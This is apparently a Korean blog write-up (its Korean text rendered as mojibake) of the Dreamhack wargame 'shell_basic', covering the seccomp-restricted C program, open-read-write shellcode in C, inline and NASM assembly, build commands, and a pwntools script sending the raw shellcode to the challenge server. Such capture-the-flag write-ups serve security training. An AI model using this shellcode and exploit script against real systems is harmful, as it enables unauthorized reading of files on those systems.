๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
[Dreamhack]SystemHacking/๋กœ๋“œ๋งต_Basic

[Dreamhack] Level2: shell_basic

by Yun2๐Ÿ‘ 2023. 8. 22.
๋ฐ˜์‘ํ˜•

๐Ÿ›Ž๏ธAccess

์ž…๋ ฅํ•œ ์…ธ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๋Š” ํ”„๋กœ๊ทธ๋žจ์ด ์„œ๋น„์Šค๋กœ ๋“ฑ๋ก๋˜์–ด ์ž‘๋™ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.
main ํ•จ์ˆ˜๊ฐ€ ์•„๋‹Œ ๋‹ค๋ฅธ ํ•จ์ˆ˜๋“ค์€ execve, execveat ์‹œ์Šคํ…œ ์ฝœ์„ ์‚ฌ์šฉํ•˜์ง€ ๋ชปํ•˜๋ฉฐ, ํ’€์ด์™€ ๊ด€๋ จ์ด ์—†์Šต๋‹ˆ๋‹ค.
flag ํŒŒ์ผ์˜ ์œ„์น˜์™€ ์ด๋ฆ„์€ /home/shell_basic/flag_name_is_loooooong์ž…๋‹ˆ๋‹ค.

 

 

๐Ÿ‘พ Exploit Algorithm & Payload

๋”๋ณด๊ธฐ
// Compile: gcc -o shell_basic shell_basic.c -lseccomp
// apt install seccomp libseccomp-dev

#include <fcntl.h>
#include <seccomp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void init() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(10);
}

void banned_execve() {
  scmp_filter_ctx ctx;
  ctx = seccomp_init(SCMP_ACT_ALLOW);
  if (ctx == NULL) {
    exit(0);
  }
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
  seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execveat), 0);

  seccomp_load(ctx);
}

void main(int argc, char *argv[]) {
  char *shellcode = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);   
  void (*sc)();
  
  init();
  
  banned_execve();

  printf("shellcode: ");
  read(0, shellcode, 0x1000);

  sc = (void *)shellcode;
  sc();
}

 

 

#1


#include<stdio.h>
#include<stdlib.h>
#include<fcntl.h>
#include<unistd.h>

int main(void){
	int fd;
    char buf[0x30];
    
    fd = open("/home/shell_basic/flag_name_is_loooooong", RD_ONLY, 0);
    read(fd, buf, 0x30);
    write(1, buf, 0x30);
}

: execve ์‹œ์Šคํ…œ ์ฝœ์„ ์‚ฌ์šฉํ•˜์ง€ ๋ชปํ•œ๋‹ค๋Š” ๋ฌธ์ œ๋ฅผ ๋ณด๊ณ  orw ์‰˜ ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•ด์„œ '/home/shell_basic/flag_name_is_loooooong' ๊ฒฝ๋กœ์— ์žˆ๋Š” flag ํŒŒ์ผ์„ ์—ด๋žŒํ•˜๋Š” ๋ฌธ์ œ์ž„์„ ์ง์ž‘ํ–ˆ๋‹ค.

: orw(Open-Read-Write) ์‰˜ ์ฝ”๋“œ๋ฅผ ์ž‘์„ฑํ•˜๊ธฐ ์ „์— c์–ธ์–ด๋กœ ๋™์ž‘์€ ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

 

 

#2


: ๋™์ž‘ ํ™•์ธ ํ›„ ์Šค์ผˆ๋ ˆํ†ค ์ฝ”๋“œ๋กœ orw ์ฝ”๋“œ์˜ ๋ผˆ๋Œ€๋ฅผ ์ž‘์„ฑํ•˜์˜€๋‹ค.

๋”๋ณด๊ธฐ

__asm__(
".global run_sh\n"
"run_sh:\n"

"xor rax, rax\n"
"push rax #NULL(=0)\n"
"mov rax, 0x676e6f6f6f6f6f6f #'oooooong'\n"
"push rax\n"
"mov rax, 0x6c5f73695f656d61  #'ame_is_l'\n"
"push rax\n"
"mov rax, 0x6e5f67616c662f63 #'c/flag_n'\n"
"push rax\n"
"mov rax, 0x697361625f6c6c65 #'ell_basi'\n"
"push rax\n"
"mov rax, 0x68732f656d6f682f #'/home/sh'\n"
"push rax\n"
"mov rdi, rsp #rdi=rsp; rdi='/home/shell_basic/flag_name_is_loooooong'\n"
"xor rsi, rsi #rsi=0\n"
"xor rdx, rdx #rdx=0\n"
"mov rax, 0x02 #rax=2; rax=sys_open\n"
"syscall #open('/home/shell_basic/flag_name_is_loooooong', RD_ONLY, NULL)\n"
"\n"

"mov rdi, rax       #rdi = fd\n"
"mov rsi, rsp\n"
"sub rsi, 0x30      #rsi = rsp-0x30; rsi=buf\n"
"mov rdx, 0x30      #rdx = 0x30; rdx=len\n"
"mov rax, 0x0       #rax = 0; rax=syscall_read\n"
"syscall            #read(fd, buf, 0x30)\n"
"\n"

"mov rdi, 1         #rdi = 1; fd = stdout\n"
"mov rax, 0x1       #rax = 1; rax=syscall_write\n"
"syscall            #write(fd, buf, 0x30)\n"
"\n"

"xor rdi, rdi       #rdi = 0\n"
"mov rax, 0x3c     #rax = sys_exit\n"
"syscall     #syscall(rax,rdi)exit(0)"
);

 

void run_sh();

int main() { run_sh(); }

 

๋”๋ณด๊ธฐ

; File name: exploit.asm

section .text
global _start

_start:
;open
xor rax, rax
push rax ;NULL(=0)
mov rax, 0x676e6f6f6f6f6f6f ;oooooong
push rax
mov rax, 0x6c5f73695f656d61 ;ame_is_l
push rax
mov rax, 0x6e5f67616c662f63 ;c/flag_n
push rax
mov rax, 0x697361625f6c6c65 ;ell_basi
push rax
mov rax, 0x68732f656d6f682f ;/home/sh
push rax
mov rdi, rsp ;rdi=rsp ;rdi=/home/shell_basic/flag_name_is_loooooong
xor rsi, rsi ;rsi=0
xor rdx, rdx ;rdx=0
mov rax, 0x02 ;rax=2 ;rax=sys_open
syscall ;open('/home/shell_basic/flag_name_is_loooooong', RD_ONLY, NULL)

;read
mov rdi, rax ;rdi = fd
mov rsi, rsp
sub rsi, 0x30 ;rsi = rsp-0x30 ;rsi=buf
mov rdx, 0x30 ;rdx = 0x30 ;rdx=len
mov rax, 0x00 ;rax = 0 ;rax=syscall_read
syscall ;read(fd, buf, 0x30)

;write
mov rdi, 0x01 ;rdi = 1 ;fd = stdout
mov rax, 0x01 ;rax = 1 ;rax=syscall_write
syscall ;write(fd, buf, 0x30)

;exit 
xor rdi, rdi ;rdi = 0
mov rax, 0x3c ;rax = sys_exit
syscall ;exit(rax,rdi)

 

: orw ์ฝ”๋“œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์ž‘์„ฑํ–ˆ๋‹ค.

: '/home/shell_basic/flag_name_is_loooooong'์˜ ๋ฌธ์ž์—ด์„ ASCII -> 16์ง„์ˆ˜ ๋ณ€ํ™˜(๋ฆฌํ‹€ ์—”๋””์–ธ ๋ฐฉ์‹)์œผ๋กœ ๋ณ€ํ™˜ํ•˜์—ฌ stack์— ๋„ฃ์–ด์ฃผ์—ˆ๋‹ค.

โ€ปstack push ๋‚ด๋ถ€ ์ˆœ์„œ → /home/sh  ell_basi c/flag_n ame_is_l oooooong \x00 )

โ€ปstack pop ๋‚ด๋ถ€์ˆœ์„œ  /home/sh ell_basi c/flag_n ame_is_l oooooong \x00 )

open ํ•จ์ˆ˜๋ฅผ syscall์„ ํ†ตํ•ด ํ˜ธ์ถœํ•œ๋‹ค.
: read ํ•จ์ˆ˜๋ฅผ 0x30๋งŒํผ ์ฝ์–ด ์ง€์—ญ๋ณ€์ˆ˜ buf์— ์ €์žฅํ•œ๋‹ค.
write ํ•จ์ˆ˜๋ฅผ syscall์„ ํ†ตํ•ด write ํ•จ์ˆ˜ ์‚ฌ์šฉํ•œ๋‹ค.
: ๋งˆ์ง€๋ง‰์œผ๋กœ ํ”„๋กœ๊ทธ๋žจ์„ ์ข…๋ฃŒ์‹œํ‚ฌ exit ํ•จ์ˆ˜ ์‚ฌ์šฉํ•œ๋‹ค.

 

 

#3


$ nasm -f elf64 exploit.asm
$ objdump -d exploit.o
$ objcopy --dump-section .text=exploit.bin exploit.o

: asm ํŒŒ์ผ์„ .oํŒŒ์ผ(์ปดํŒŒ์ผ)ํ™” ์‹œํ‚ค๊ธฐ ์œ„ํ•ด nasm ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ–ˆ๋‹ค.

: objcopy ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ objdump๋ฅผ byte code(opcode)์˜ ํ˜•ํƒœ๋กœ ์ถ”์ถœํ–ˆ๋‹ค.

: ์ถ”์ถœ ํ›„ ์„œ๋ฒ„๋กœ ์…ธ ์ฝ”๋“œ๋ฅผ ํš๋“ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

๐Ÿ”‘Analysis and results for obtaining the Flag DH{…}


๋”๋ณด๊ธฐ

from pwn import *
  
r = remote("host3.dreamhack.games", 17047)
 
shellcode = b"\x48\x31\xc0\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x69\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x61\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x62\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x65\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\xba\x30\x00\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05"  

 

r.sendafter(b": ", shellcode)
r.interactive()

+ ์ถ”๊ฐ€๋กœ python ๋ชจ๋“ˆ pwntools๋กœ๋„ FLAG๋ฅผ ํš๋“ํ•  ์ˆ˜ ์žˆ๋‹ค.

 

 

๐Ÿ“ŒSummary


๊ณต๊ฒฉ์ž๊ฐ€ ์‰˜ ์ฝ”๋“œ๋ฅผ ์ด์šฉํ•˜๋ฉด ํ•ด๋‹น๋˜๋Š” ์ฝ”๋“œ๋Š” ์ •์ƒ์ ์ธ ๋™์ž‘์„ ํ•˜์ง€ ์•Š์„ ์ˆ˜ ์žˆ์Œ

ํ•ด๋‹น ์ฝ”๋“œ์˜ rip์ด ๊ณต๊ฒฉ์ž๊ฐ€ ์ž‘์„ฑ๋œ ์…€ ์ฝ”๋“œ๋กœ ์ด๋™๋˜์–ด ์˜๋„๋œ ์—„์…ˆ๋ธ”๋ฆฌ ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์Œ

๋˜ํ•œ ์–ด์…ˆ๋ธ”๋ฆฌ์–ด๋Š” ๊ธฐ๊ณ„์–ด์™€ ๊ฑฐ์˜ ์ผ๋Œ€์ผ ๋Œ€์‘๋˜๋ฏ€๋กœ ์›ํ•˜๋Š” ๋ชจ๋“  ๋ช…๋ น์„ CPU์— ๋‚ด๋ฆด ์ˆ˜ ์žˆ๊ฒŒ ๋จ

 

mmap ์‚ฌ์šฉ: ์ฝ”๋“œ์—์„œ mmap์„ ์‚ฌ์šฉํ•˜์—ฌ ์‰˜์ฝ”๋“œ๋ฅผ ํ• ๋‹นํ•˜๊ณ  ํ•ด๋‹น ๋ฉ”๋ชจ๋ฆฌ๋ฅผ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ๋ฉ”๋ชจ๋ฆฌ๋กœ ์„ค์ •
์‰˜์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋˜๋„๋ก ํ•˜๋Š” ๋ฐฉ๋ฒ•์ด๋ฉฐ, ์•…์šฉ๋  ๊ฒฝ์šฐ ๋ณด์•ˆ์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ์Œ

seccomp ์„ค์ •: banned_execve() ํ•จ์ˆ˜์—์„œ libseccomp์„ ์‚ฌ์šฉํ•˜์—ฌ execve ๋ฐ execveat ์‹œ์Šคํ…œ ์ฝœ์„ ์ฐจ๋‹จ
๊ทธ๋Ÿฌ๋‚˜ ์ด๊ฒƒ๋งŒ์œผ๋กœ๋Š” ๋ชจ๋“  ๊ณต๊ฒฉ์„ ์™„๋ฒฝํ•˜๊ฒŒ ๋ง‰์„ ์ˆ˜ ์—†์Œ

๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ๊ฐ€๋Šฅ์„ฑ: read(0, shellcode, 0x1000);์—์„œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ๋ฉ”๋ชจ๋ฆฌ ํ• ๋‹น ํฌ๊ธฐ๋ฅผ ์ดˆ๊ณผํ•  ๊ฒฝ์šฐ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Œ

...

 

๋”ฐ๋ผ์„œ ์ •์  ๋ถ„์„ ๋ฐ ์ฝ”๋“œ ๊ฒ€ํ† ๋ฅผ ์ฒ ์ €ํžˆ ์ˆ˜ํ–‰ํ•˜๊ณ , ๋ฐฐํฌ ์ „์— ์ทจ์•ฝ์ ์„ ์‹๋ณ„ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ด์•ผํ•˜๋ฉฐ ๊ฐ๋ณ„ํžˆ ์—ฌ๋Ÿฌ ๋ถ€๋ถ„์—์„œ ์ฃผ์˜ํ•ด์•ผ ํ•จ

 

 

๋ฐ˜์‘ํ˜•

'[Dreamhack]SystemHacking > ๋กœ๋“œ๋งต_Basic' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Dreamhack] Level1: Return to Shellcode  (0) 2023.08.30
[Dreamhack] Level1: basic_exploitation_001  (0) 2023.08.28
[Dreamhack] Level2: basic_exploitation_000  (0) 2023.08.25
[Dreamhack] Level1: Return Address Overwrite  (0) 2023.08.18